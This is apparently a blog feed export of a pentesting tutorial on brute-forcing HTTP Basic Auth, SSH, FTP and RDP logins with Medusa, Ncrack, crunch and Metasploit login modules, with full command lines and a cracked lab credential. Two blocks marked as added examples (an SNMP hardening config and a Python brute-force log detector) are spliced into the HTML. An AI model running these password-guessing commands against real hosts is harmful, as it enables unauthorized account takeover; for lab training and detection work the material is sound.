<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-1d8vGG-OBIfDIq082iNe-1dX2yg_UPGmAFOlgDnGXtUKohyphenhyphenYaGduZFWzsL04s5DvEqTKThw6SVLyy7k_GdIx7qXCIiIb135yG5DqM0cPSeSi2tqkAQH_luPnwEgA9h11uAOdxrTwGzQ/s1600/Screen+Shot+2017-04-09+at+11.31.36+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="84" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-1d8vGG-OBIfDIq082iNe-1dX2yg_UPGmAFOlgDnGXtUKohyphenhyphenYaGduZFWzsL04s5DvEqTKThw6SVLyy7k_GdIx7qXCIiIb135yG5DqM0cPSeSi2tqkAQH_luPnwEgA9h11uAOdxrTwGzQ/s640/Screen+Shot+2017-04-09+at+11.31.36+PM.png" width="640" /></a></div>
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; letter-spacing: normal; margin: 0px; text-align: left; text-transform: none; white-space: normal; word-spacing: 0px;">
<br /></div>
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; font-weight: normal; letter-spacing: normal; margin: 0px; text-align: left; text-transform: none; white-space: normal; word-spacing: 0px;">
<br /></div>
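The community string all three tools recovered is only as strong as the snmpd configuration that sets it. As an added example (not from the post), this net-snmp snmpd.conf fragment shows the weak setting beside a hardened one; the long community string, the monitoring-host address 192.168.131.5 and the SNMPv3 passphrases are placeholders.

```conf
# /etc/snmp/snmpd.conf (net-snmp)

# Weak: a short, guessable read-only community reachable from any source,
# which is exactly what a dictionary run like the ones above recovers.
# rocommunity mike

# Hardened, if SNMPv2c must stay: a long random community (placeholder below),
# restricted to the monitoring host (placeholder address) and to a small view.
rocommunity REPLACE-WITH-LONG-RANDOM-STRING 192.168.131.5/32 -V systemonly
view systemonly included .1.3.6.1.2.1.1
view systemonly included .1.3.6.1.2.1.25.1

# Preferred: SNMPv3 with authentication and encryption, no community string.
createUser monitor SHA "REPLACE-auth-passphrase" AES "REPLACE-priv-passphrase"
rouser monitor priv
```

With SNMPv3 in place, the v1/v2c community lines should be removed entirely, since a remaining community string is what a wordlist can still guess.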
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; font-weight: normal; letter-spacing: normal; margin: 0px; text-align: left; text-transform: none; white-space: normal; word-spacing: 0px;">
In the next <a href="http://www.websecgeeks.com/2017/04/hacking-snmp-service-part-2-post.html" target="_blank">post</a>, we will see how SNMP can be used for post-exploitation.</div>
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; font-weight: normal; letter-spacing: normal; margin: 0px; text-align: left; text-transform: none; white-space: normal; word-spacing: 0px;">
<br /></div>
<div class="separator" style="clear: both; color: black; font-family: times; font-size: medium; font-style: normal; font-weight: normal; letter-spacing: normal; margin: 0px; text-align: left; text-transform: none; white-space: normal; word-spacing: 0px;">
<br /></div>
</div>
</div>
Narendra Bhatihttp://www.blogger.com/profile/15834240919754131768noreply@blogger.com1tag:blogger.com,1999:blog-3462277729309057123.post-13732783809930345792017-04-09T23:51:00.000+05:302017-04-11T16:37:49.156+05:30Cracking SSH FTP HTTP FTP : Attacking Network - Network Pentesting<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLDArNF5QAyDm1ELcFy_cg1jntIhgFRSWDWXp9HL8oZcZMnJJ-lM6ReQ6Gx89y_ATKxnKGxI0W7l6N8azOTsjZKh2pjtb5QLl9IQmCJsd-yAu9SJ7GXkM8JUP-JbCKxxxMB5z_lonJ8Tg/s1600/405.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="213" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLDArNF5QAyDm1ELcFy_cg1jntIhgFRSWDWXp9HL8oZcZMnJJ-lM6ReQ6Gx89y_ATKxnKGxI0W7l6N8azOTsjZKh2pjtb5QLl9IQmCJsd-yAu9SJ7GXkM8JUP-JbCKxxxMB5z_lonJ8Tg/s320/405.jpeg" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<h2 style="clear: both; text-align: center;">
Cracking SSH FTP HTTP FTP : Attacking Network - Network Pentesting</h2>
<div class="separator" style="clear: both; text-align: left;">
Apart from using default credentials, we can also perform a brute-force attack on various services to get into them.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b>1) HTTP</b> (htaccess-protected web directory)</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Medusa comes to the rescue when we talk about cracking HTTP Basic Authentication on a password-protected web directory.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Medusa command line for cracking Basic Authentication on a password-protected web directory:</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b>medusa -h 192.168.11.219 -u admin -P Desktop/demo/password -M http -m DIR:/secret -T 10</b></div>
<div class="separator" style="clear: both; text-align: left;">
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: left;">
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: left;">
Medusa will try each <b>password</b> from the password list against the <b>user</b> admin on the <b>password-protected web directory</b> secret.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<a name='more'></a><br />
<div class="separator" style="clear: both; text-align: left;">
<b>2) SSH</b></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Ncrack comes in very handy for SSH password cracking; we can crack an SSH password using Ncrack as follows.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both;">
<b>A) ncrack -p 22 --user admin -P Desktop/demo/password 192.168.131.135</b></div>
<div class="separator" style="clear: both;">
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyS7rT41dD5pcP5R6CYbNF0nRcdqLqmCUPRohOZ4D6Ret_pHRAoOd1YB0VFOmucR3srS_1196dPN1L9zEOOLFKW6esvALjMKfztw7UymQMvOExJSWyu6hn6hKupwD_h3uOkfMwFPf2XcI/s1600/Screen+Shot+2017-04-09+at+6.15.58+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="198" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyS7rT41dD5pcP5R6CYbNF0nRcdqLqmCUPRohOZ4D6Ret_pHRAoOd1YB0VFOmucR3srS_1196dPN1L9zEOOLFKW6esvALjMKfztw7UymQMvOExJSWyu6hn6hKupwD_h3uOkfMwFPf2XcI/s640/Screen+Shot+2017-04-09+at+6.15.58+PM.png" width="640" /></a></div>
<div class="separator" style="clear: both;">
<b><br /></b></div>
<div class="separator" style="clear: both;">
<b><br /></b></div>
<div class="separator" style="clear: both;">
<b>Note - We can use crunch to create a wordlist for password cracking.</b></div>
<div class="separator" style="clear: both;">
<b>Command format would be: </b>crunch &lt;minlen&gt; &lt;maxlen&gt; &lt;charset&gt; > outfile</div>
<div class="separator" style="clear: both;">
<b>Command</b>: crunch 4 4 abcd123 > password (every 4-character string over the characters abcd123)</div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
<b>B) Metasploit:</b></div>
<div class="separator" style="clear: both;">
<b><br /></b></div>
<div class="separator" style="clear: both;">
We can also use Metasploit to crack SSH passwords.</div>
<div class="separator" style="clear: both;">
Using <b>auxiliary/scanner/ssh/ssh_login</b></div>
<div class="separator" style="clear: both;">
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqn5WkOFYyjXXPPIomCeGC9gz9slczBx64_0Okgk2uVldwMOEhiCeEUKcVbWE7f714oJ0W-nx3ZVSYTZR6Jl3PLEW1DtqZqmYY4OaB6h_mQLdKkacjDUdoxJotPdpLDeDY8tbvLsZy7yQ/s1600/Screen+Shot+2017-04-09+at+6.23.53+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="260" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqn5WkOFYyjXXPPIomCeGC9gz9slczBx64_0Okgk2uVldwMOEhiCeEUKcVbWE7f714oJ0W-nx3ZVSYTZR6Jl3PLEW1DtqZqmYY4OaB6h_mQLdKkacjDUdoxJotPdpLDeDY8tbvLsZy7yQ/s640/Screen+Shot+2017-04-09+at+6.23.53+PM.png" width="640" /></a></div>
<div class="separator" style="clear: both;">
<b><br /></b></div>
<div class="separator" style="clear: both;">
Set the required details with <b>SET PARAMETERNAME</b>. After setting everything required, run/exploit.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRkCUXbZe89FA8bnYRgawAu3O7mhai7HTGE8XCsVLDxpCkyNcrq65tBdYoSip9tL4iDSl-lwNm_by_g8ZPT4H7SwGjDG0zVl67xJglfJJSwe4H3O8mCCZuLm-YzmPDC81FwTF0glFQbjc/s1600/Screen+Shot+2017-04-09+at+6.28.42+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="132" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRkCUXbZe89FA8bnYRgawAu3O7mhai7HTGE8XCsVLDxpCkyNcrq65tBdYoSip9tL4iDSl-lwNm_by_g8ZPT4H7SwGjDG0zVl67xJglfJJSwe4H3O8mCCZuLm-YzmPDC81FwTF0glFQbjc/s640/Screen+Shot+2017-04-09+at+6.28.42+PM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEttv67v-TY9EHBX7H1ptk6nCQaLgR4nOp8HtT5jBxy8eTOzGSBRuYhsAjOm-ASwrW2ddJpMk5tXaVGa4HNhTdIjwOy5zK78ELrZvmThc9-vYXgaylhTdyelSEX2pJTFf1An5yQ6cqhck/s1600/Screen+Shot+2017-04-09+at+6.29.00+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="96" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEttv67v-TY9EHBX7H1ptk6nCQaLgR4nOp8HtT5jBxy8eTOzGSBRuYhsAjOm-ASwrW2ddJpMk5tXaVGa4HNhTdIjwOy5zK78ELrZvmThc9-vYXgaylhTdyelSEX2pJTFf1An5yQ6cqhck/s640/Screen+Shot+2017-04-09+at+6.29.00+PM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div>
Metasploit cracked the password.<br />
<br />
<br />
<b>C) Medusa</b><br />
<b><br /></b>
We can achieve the Same Goal Using Medusa.<br />
<br />
<b>medusa -h 192.168.131.135 -u admin -P Desktop/demo/password -M ssh</b><br />
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEju3ym_Uu4hscxuT09qFYGciynlR8J0DLTqwGsaZ_CW_6AhXuaHGnezOIpbtigye83_0OB7bko67mdyIYojyj2SaUTZ8GJ9OVoKWa7S7NO8Y0crgFS5yBHSaOdQU3hNHIxlyRiJC067O4k/s1600/Screen+Shot+2017-04-09+at+6.36.44+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="62" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEju3ym_Uu4hscxuT09qFYGciynlR8J0DLTqwGsaZ_CW_6AhXuaHGnezOIpbtigye83_0OB7bko67mdyIYojyj2SaUTZ8GJ9OVoKWa7S7NO8Y0crgFS5yBHSaOdQU3hNHIxlyRiJC067O4k/s640/Screen+Shot+2017-04-09+at+6.36.44+PM.png" width="640" /></a></div>
<b><br /></b>
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjX45D5e4D2dVNVPEk9fnod_r5BEFEBf0ywNvph-PnnDIrm7EBHAr-WmmUBUaFmHnQGs6ySBDtE5XdxjawPnnwjSyjgK7l5SY8sFmuIX9Rr3K-HbLKw9RsFNASMXBXKcHpOo7WtATD-RmI/s1600/Screen+Shot+2017-04-09+at+6.37.00+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="60" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjX45D5e4D2dVNVPEk9fnod_r5BEFEBf0ywNvph-PnnDIrm7EBHAr-WmmUBUaFmHnQGs6ySBDtE5XdxjawPnnwjSyjgK7l5SY8sFmuIX9Rr3K-HbLKw9RsFNASMXBXKcHpOo7WtATD-RmI/s640/Screen+Shot+2017-04-09+at+6.37.00+PM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Medusa was also able to crack the SSH password.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
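From the defender's side, the Medusa run against the <b>secret</b> directory in section 1 and the Ncrack, Metasploit and Medusa runs against SSH above leave the same trace on the target: one source producing many failed logins within seconds, often ending in a single success. The Python below is an added example, not the author's code or any of these tools'; it parses constructed sshd auth.log and Apache access-log lines and flags such bursts per source IP. The host name target, the IPs, timestamps and the /secret path are constructed, and the threshold and window are illustrative defaults.

```python
import re
from collections import defaultdict, namedtuple
from datetime import datetime, timedelta

Event = namedtuple("Event", "ts ip user success")  # one login attempt

# sshd lines as written to /var/log/auth.log (syslog format, year omitted).
SSHD_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)
# Apache combined-format lines; a 401 is a rejected Basic-Auth attempt.
HTTP_RE = re.compile(
    r'^(?P<ip>[\d.]+) - (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"\S+ (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

def parse_sshd(lines, year=2017):
    """Events from sshd auth.log lines; syslog omits the year, so pass it in."""
    events = []
    for line in lines:
        m = SSHD_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            events.append(Event(ts, m["ip"], m["user"], m["result"] == "Accepted"))
    return events

def parse_http(lines, protected_prefix="/secret"):
    """Events for requests under the protected directory: 401 fails, 2xx succeeds."""
    events = []
    for line in lines:
        m = HTTP_RE.match(line)
        if not m or not m["path"].startswith(protected_prefix):
            continue
        status = int(m["status"])
        if status == 401 or 200 <= status < 300:
            ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
            events.append(Event(ts, m["ip"], m["user"], status != 401))
    return events

def detect_bursts(events, threshold=5, window=timedelta(seconds=60)):
    """Source IPs with >= threshold failures inside any `window`, the users tried, and whether a login then succeeded."""
    by_ip = defaultdict(list)
    for ev in sorted(events, key=lambda e: e.ts):
        by_ip[ev.ip].append(ev)
    alerts = {}
    for ip, evs in by_ip.items():
        fails = [e for e in evs if not e.success]
        burst_end, left = None, 0
        for right in range(len(fails)):
            # slide the left edge until the failures in view span at most `window`
            while fails[right].ts - fails[left].ts > window:
                left += 1
            if right - left + 1 >= threshold:
                burst_end = fails[right].ts
        if burst_end is None:
            continue
        hit = next((e for e in evs if e.success and e.ts >= burst_end), None)
        alerts[ip] = {"failures": len(fails),
                      "users": sorted({e.user for e in fails}),
                      "success_after_burst": hit is not None,
                      "compromised_user": hit.user if hit else None}
    return alerts

# Constructed samples: a dictionary run from 192.168.131.10 that ends in a hit,
# plus a legitimate user on 10.0.0.5 who mistyped a password once.
SAMPLE_AUTH_LOG = [
    f"Apr  9 18:15:0{i // 2} target sshd[20{i}1]: Failed password for admin "
    f"from 192.168.131.10 port 5011{i} ssh2" for i in range(6)
] + [
    "Apr  9 18:15:04 target sshd[2071]: Accepted password for admin from 192.168.131.10 port 50120 ssh2",
    "Apr  9 18:20:15 target sshd[2101]: Failed password for alice from 10.0.0.5 port 41000 ssh2",
    "Apr  9 18:20:40 target sshd[2103]: Accepted password for alice from 10.0.0.5 port 41002 ssh2",
]
SAMPLE_ACCESS_LOG = [
    f'192.168.131.10 - admin [09/Apr/2017:18:40:0{i} +0530] "GET /secret/ HTTP/1.1" 401 381'
    for i in range(5)
] + ['192.168.131.10 - admin [09/Apr/2017:18:40:05 +0530] "GET /secret/ HTTP/1.1" 200 1024',
     '10.0.0.8 - - [09/Apr/2017:18:41:00 +0530] "GET /index.html HTTP/1.1" 200 512']

if __name__ == "__main__":
    for name, evs in (("sshd", parse_sshd(SAMPLE_AUTH_LOG)), ("http", parse_http(SAMPLE_ACCESS_LOG))):
        for ip, report in detect_bursts(evs).items():
            print(f"[{name}] {ip}: {report}")
```

A burst that ends in "success_after_burst": True is the case worth paging on, since the account named in compromised_user should be treated as taken over rather than merely probed.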
<div class="separator" style="clear: both; text-align: left;">
<b>3) FTP</b></div>
<div class="separator" style="clear: both; text-align: left;">
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: left;">
<b>A) Ncrack</b></div>
<div class="separator" style="clear: both; text-align: left;">
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: left;">
To crack an FTP password, we can also use Ncrack.</div>
<div class="separator" style="clear: both; text-align: left;">
<b><br /></b></div>
<div class="separator" style="clear: both;">
<b>ncrack -p 21 --user admin -P Desktop/demo/password 192.168.0.7 -vv</b></div>
<div class="separator" style="clear: both;">
<b><br /></b></div>
<div class="separator" style="clear: both;">
This time our target machine is 192.168.0.7.</div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihk8wuqJsIoUEedwfNj3Xf1G_naVmSgVCkI-gWh9dAuPZ8oGivxmDptEpeiFCrWDsgtkcwwcTQvPuNxuCGLgh0vzHpoq6v6VukcNqMj43CC7VPeA1-RciJH7AzeMoMFHNVy31asQ1UoYw/s1600/Screen+Shot+2017-04-09+at+9.50.41+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="112" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihk8wuqJsIoUEedwfNj3Xf1G_naVmSgVCkI-gWh9dAuPZ8oGivxmDptEpeiFCrWDsgtkcwwcTQvPuNxuCGLgh0vzHpoq6v6VukcNqMj43CC7VPeA1-RciJH7AzeMoMFHNVy31asQ1UoYw/s640/Screen+Shot+2017-04-09+at+9.50.41+PM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both;">
<br /></div>
<div>
<b>B ) Metasploit</b></div>
<div>
<b><br /></b></div>
<div>
There is an auxiliary module for cracking FTP credentials in Metasploit:</div>
<div>
<br /></div>
<div>
<b>auxiliary/scanner/ftp/ftp_login</b><br />
<b><br /></b><b>4) RDP (Remote Desktop Protocol)</b><br />
<b><br /></b>
<b>ncrack -u rdp -P Desktop/demo/password.txt -p rdp 192.168.131.137</b><br />
<b><br /></b>
Ncrack successfully found the valid credentials: user "rdp" and password "rdppass".<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSqPXJsFFbKeql0vvb4tEEnUmk8DWhwA6aBfLFexR-d3PHvZEEwVPIDvfy8wHwLt-j6p9hh4bkQochmtApF0z86yXpSJFHIqoHOTkd1ErHI9IGUroKjvwJsBkDZ4KBxgxlwVZ5l6Ogr_Y/s1600/Screen+Shot+2017-04-10+at+12.21.05+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="170" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSqPXJsFFbKeql0vvb4tEEnUmk8DWhwA6aBfLFexR-d3PHvZEEwVPIDvfy8wHwLt-j6p9hh4bkQochmtApF0z86yXpSJFHIqoHOTkd1ErHI9IGUroKjvwJsBkDZ4KBxgxlwVZ5l6Ogr_Y/s640/Screen+Shot+2017-04-10+at+12.21.05+AM.png" width="640" /></a></div>
<br />
<b><br /></b>
<b><br /></b>
<b><br /></b></div>
</div>
<div style="text-align: center;">
<br /></div>
</div>
Narendra Bhatihttp://www.blogger.com/profile/15834240919754131768noreply@blogger.com0